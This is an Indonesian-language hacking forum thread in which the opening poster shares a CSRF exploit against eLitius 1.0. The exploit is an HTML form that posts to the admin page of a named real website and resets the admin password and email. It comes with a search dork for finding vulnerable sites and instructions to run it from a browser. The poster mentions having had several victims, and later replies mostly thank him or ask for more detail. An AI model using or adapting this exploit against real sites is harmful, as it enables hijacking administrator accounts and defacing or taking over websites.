| Sedikit mengenai CSRF attack | |
|
+8Gariz_Keraz AccHill35 SyNTaX eRRoR SOA.hugo kurtz CS-31 Neo|g4br1eL cyberkalashnikov 12 posters |
Pengirim | Message |
---|
cyberkalashnikov
Jumlah posting : 118 Join date : 07.01.10 Lokasi : /bin/bash
| Subyek: Sedikit mengenai CSRF attack Thu Jan 07, 2010 9:37 pm | |
| In the name of Allah CSRF ==> Cross Site Requery Forgery mungkin sedikit asing di dengar.. csrf merupakan salah satu exploit dalam web aplikasi yang bisa di gunakan untuk melakukan penetrasi kedalam web yang di jadikan target... merupakan salah satu exploit favorit ana.. hhe.. karena simple n mudah... wew gimana caranya ntu... ana ambil contoh bugs lama... tapi gak tau masih bisa jalan atau gak..soalnya exploit ini udah jadul banget.. tapi ana tulis hanya untuk sekedar pengetahuan... tidak ada kata basi dalam ilmu pengetahuan.. target kita.. http://www.hwb-services.co.uk exploit = CSRF dork = Powered by eLitius Version 1.0 ok.. kita ambil sample code html yang bisa di gunakan untuk bypassing admin login melalui csrf attack... - Code:
-
<title> Powered by eLitius Version 1.0 Change Password
<form action="http://www.hwb-services.co.uk/admin/manage-admin.php" method="post" name="adminForm"> <table class="admintable"> <tbody> <tr> <td> <table class="adminform" cellpadding="0" cellspacing="0"> <tbody> <tr> <th colspan="2"> Change Password Of admin </th> </tr> <tr>
</tr> <tr> <td>Username:</td> <td> <input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" /> </td> </tr> <tr> <td> Password:</td> <td> <input class="inputbox" name="password" size="40" value="admin" type="text" /> </td> </tr> <tr> <td> Email:</td> <td> <input class="inputbox" name="email" size="40" value="cyber.kalashnikov@gmail.com" type="text" /> </td> </tr> <tr> <td colspan="2"> </td> </tr>
</tbody> </table> <input name="task" value="" type="hidden" /> <div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"> </div> </td> <td style="vertical-align: top; margin: 0; padding: 0;"> <table class="adminform" cellpadding="0" cellspacing="0"> <tr> <th colspan="2">Dork: Powered by eLitius Version 1.0</th> </tr>
<tr> <center> <td style="font-weight: bold;"> CYBER.KALASHNIKOV</td> 7lt;/center> </tr> </table> </td> </tr> </tbody> </table> <input name="cid[]" value="1" type="hidden" /> <td>Download:http://www.elitius.com/</td> </form>
</body> </html> sekarang copy kedalam notepad.. terus simpan dalam ekstensi html terus eksekusi melalui web browser antum skalian... semoga bermanfaat.. jazakallah khair | |
|
| |
Tamu Tamu
| Subyek: Re: Sedikit mengenai CSRF attack Fri Jan 08, 2010 9:58 am | |
| Syukron akhi
Jazakallah khairon |
|
| |
Neo|g4br1eL
Jumlah posting : 86 Join date : 07.01.10
| Subyek: Re: Sedikit mengenai CSRF attack Fri Jan 08, 2010 4:32 pm | |
| Mantaf bro,nice share dlu klau g salah friendster jg ada bug bginian | |
|
| |
CS-31
Jumlah posting : 42 Join date : 05.01.10 Age : 33 Lokasi : Ngalam
| Subyek: Re: Sedikit mengenai CSRF attack Fri Jan 08, 2010 11:38 pm | |
| good share ijin mempelajari | |
|
| |
kurtz
Jumlah posting : 16 Join date : 11.01.10 Age : 38 Lokasi : Jakarta
| Subyek: Re: Sedikit mengenai CSRF attack Mon Jan 11, 2010 5:50 pm | |
| POC secara lengkapy dun sob, mklum newbie baru denger CSRF | |
|
| |
SOA.hugo
Jumlah posting : 36 Join date : 10.01.10 Age : 33 Lokasi : tangerang
| Subyek: Re: Sedikit mengenai CSRF attack Mon Jan 11, 2010 8:49 pm | |
| assalamualaikum.. iya akhi POC secara detailnya.. kalau bisa ada video tutornya..hehehe.. | |
|
| |
SyNTaX eRRoR
Jumlah posting : 28 Join date : 12.01.10
| Subyek: Re: Sedikit mengenai CSRF attack Fri Jan 15, 2010 11:16 pm | |
| ilmu lagi neh... mantab jaya dah | |
|
| |
AccHill35
Jumlah posting : 15 Join date : 12.01.10 Age : 31 Lokasi : Palembang
| Subyek: Re: Sedikit mengenai CSRF attack Sat Jan 16, 2010 12:11 am | |
| Alhamdulillah, ilmu baru,
kalo ga salah, Ini type attack yg memodifikasi script dari webpage ya akhi ? | |
|
| |
Gariz_Keraz
Jumlah posting : 120 Join date : 12.01.10 Age : 29 Lokasi : Mojokerto
| Subyek: Re: Sedikit mengenai CSRF attack Sat Jan 16, 2010 12:34 am | |
| Syukron Akhi....
dapet ilmu baru.... | |
|
| |
cyberkalashnikov
Jumlah posting : 118 Join date : 07.01.10 Lokasi : /bin/bash
| Subyek: Re: Sedikit mengenai CSRF attack Sat Jan 16, 2010 4:55 am | |
| - SOA.hugo wrote:
- assalamualaikum..
iya akhi POC secara detailnya.. kalau bisa ada video tutornya..hehehe.. kalau poc dari video.. agak ribet.. soalnya ini exploit langka n jarang dapat.. hhe... ana ada dapat beberapa kali korban...tapi lupa terus untuk di dokumentasikan dalam bentuk video.. afwan akhi | |
|
| |
cyberkalashnikov
Jumlah posting : 118 Join date : 07.01.10 Lokasi : /bin/bash
| Subyek: Re: Sedikit mengenai CSRF attack Sat Jan 16, 2010 4:57 am | |
| - AccHill35 wrote:
- Alhamdulillah, ilmu baru,
kalo ga salah, Ini type attack yg memodifikasi script dari webpage ya akhi ? kurang lebih begitu akhi... trik ini bisa di pake untuk bypassing filterisasi melalui celah client side script... Makanya dalam buku SIH dari om sto... jangan pernah percaya dengan apa yang dikirimkan melalui client side... | |
|
| |
T-roy
Jumlah posting : 4 Join date : 03.05.10
| Subyek: Re: Sedikit mengenai CSRF attack Mon May 03, 2010 6:15 am | |
| asa'mekum anak bru ne..... lam knl buat kk'?? | |
|
| |
Ghur4b4
Jumlah posting : 15 Join date : 23.06.10
| Subyek: Re: Sedikit mengenai CSRF attack Fri Jun 25, 2010 1:51 am | |
| bru coba tpi lo bisa.. mklum nubie.. bwt master2 skalian mohon ptnjuk n tutor lengkapnya dunk.. syukron | |
|
| |
El-Farhatz
Jumlah posting : 60 Join date : 20.03.10 Lokasi : Bumi Allah
| Subyek: Re: Sedikit mengenai CSRF attack Sat Jun 26, 2010 3:42 am | |
| wah manteb neh akhi ,,,,seep , coba coba dulu ah | |
|
| |
rascal_21
Jumlah posting : 68 Join date : 29.04.10 Age : 34 Lokasi : Cyber Jihad
| Subyek: Re: Sedikit mengenai CSRF attack Wed Jun 30, 2010 3:35 pm | |
| izin plajari dolo..akhi Jazakallah khairon | |
|
| |
Sponsored content
| Subyek: Re: Sedikit mengenai CSRF attack | |
| |
|
| |
| Sedikit mengenai CSRF attack | |
|